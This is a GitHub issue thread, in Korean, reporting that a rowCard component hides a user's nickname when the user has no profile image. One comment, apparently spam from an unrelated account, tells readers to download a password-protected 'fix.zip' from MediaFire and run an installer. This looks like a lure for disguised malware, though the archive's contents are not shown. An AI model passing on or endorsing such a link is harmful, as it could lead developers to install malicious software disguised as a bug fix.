### ISSUE TITLE
[BUG] : rowCard 유저 이미지가 없는 경우 닉네임도 표시 안되는 버그

### ISSUE THREAD

**Issue by changchangwoo** [Programmers-SpotLight/SpotLight#268]
## ✨ 버그 설명

유저 아이디가 없을 때 rowCard에서 아예 닉네임이 표시되지 않는 버그

## 📷 스크린 샷
![Image](https://github.com/user-attachments/assets/c02d881f-ea16-4013-8ecc-bb4b328fc0b1)

**Comment by paozhuanis1** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
